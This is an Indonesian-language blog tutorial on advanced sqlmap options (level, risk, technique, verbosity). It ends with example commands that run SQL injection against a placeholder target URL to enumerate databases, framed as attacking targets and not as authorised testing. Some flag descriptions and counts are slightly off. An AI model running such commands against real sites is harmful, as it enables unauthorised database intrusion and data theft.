Tutorial SQLmap Advanced - Deep Injection

  • Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.
Apa itu Deep Injection ? apa fungsinya ? pasti kalian menanyakan itu, sesuai namanya yang artinya injeksi secara mendalam.



Yang perlu kalian ketahui tentang SQLMap Deep Injection adalah ada 3 command wajib yang harus kalian ketahui seperti :
  • --level
  • --risk
  • --technique
  • --v atau --veborsity
Jika kalian biasanya hanya memakai command bassic seperti "--dbs" ataupun "--random-agent" pasti ada yang vulnerable ada juga yang tidak, tergantung Error pada target seperti apa. Error target berbeda-beda, contohnya seperti error di bagian Heavy Query ada juga yang error pada bagian OR-Based maka dari itu jika kalian menginjeksi suatu target hanya menggunakan "--dbs" sama artinya kalian hanya membuang-buang watu saja. di sini saya akan membagikan trik dan tips untuk kalian. yang pertama adalah :

Command RISK

Command risk ini menginjeksi target dengan payload yang lebih spesifik seperti Heavy Query Time-Based SQL ataupun OR-Based SQL.
  • --risk=1 (Menambahkan injeksi lanjutan)
  • --risk=2 (Menambahkan injeksi Heavy Query Time-Based SQL)
  • --risk=3 (Menambahkan injeksi OR-Based SQL)
Command LEVEL

Command level ini menentukan tingkat injeksi yang akan berlangsung seperti cookie injection ataupun header injection.
  • --level=1 (Injeksi secara Default)
  • --level=2 (Menambahkan Cookie untuk di injeksi)  
  • --level=3 (Menambahkan Header Referer untuk di injeksi)
  • --level=4 (Menambahkan Header Referer lanjutan untuk di injeksi)
  • --level=5 (Menambahkan Header Host untuk di injeksi)
 Command TECHNIQUE

Command technique ini adalah salah satu command yang berfungsi untuk mempercepat injeksi kalian. jika kalian menggunakan "--level=5" berarti default dari technique adalah "--technique=BEUSTQ" coba kalian fahami command technique ini pasti kalian akan mengerti Error pada target yang memakai "--v 3".
  • --technique=B (Boolean-based blind)
  • --technique=E (Error-based)
  • --technique=U (Union query-based)
  • --technique=S (Stacked queries)
  • --technique=T (Time-based blind)
  • --technique=Q (Inline queries)
Command V atau VEBORSITY
 Command veborsity adalah command unyuk menampilkan pesan lanjutan pada injeksi pada SQLMap berikut ada 6 command veborsity diantaranya :

  • -v 0 (Hanya menampilkan traceback Python ataupu Error critical)
  • -v 1 (Menampilkan informasi dan pesan peringatan "Default")
  • -v 2 (Menampilkan pesan Debug)
  • -v 3 (Menampilkan pesan Payload injeksi)
  • -v 4 (Menampilkan permintaan HTTP)
  • -v 5 (Menampilkan repon HTTP)
  • -v 6 (Menampilkan seluruh kontent target)
contoh penggunaan Deep Injection pada SQLMap :

[email protected]:~# sqlmap.py -u "target.com/index.php?id=1" --dbs --random-agent --level=5 --risk=3 --technique=BUST

[email protected]:~# sqlmap.py -u "target.com/index.php?id=1" --dbs --random-agent --level=3 --risk=1 --technique=BT

[email protected]:~# sqlmap.py -u "target.com/index.php?id=1" --dbs --random-agent --level=5 --risk=3 --technique=BUSTQ

Sekian tutorial dari saya, semoga bermanfaat untuk kalian. ~Ransacker

Artikel Terbaru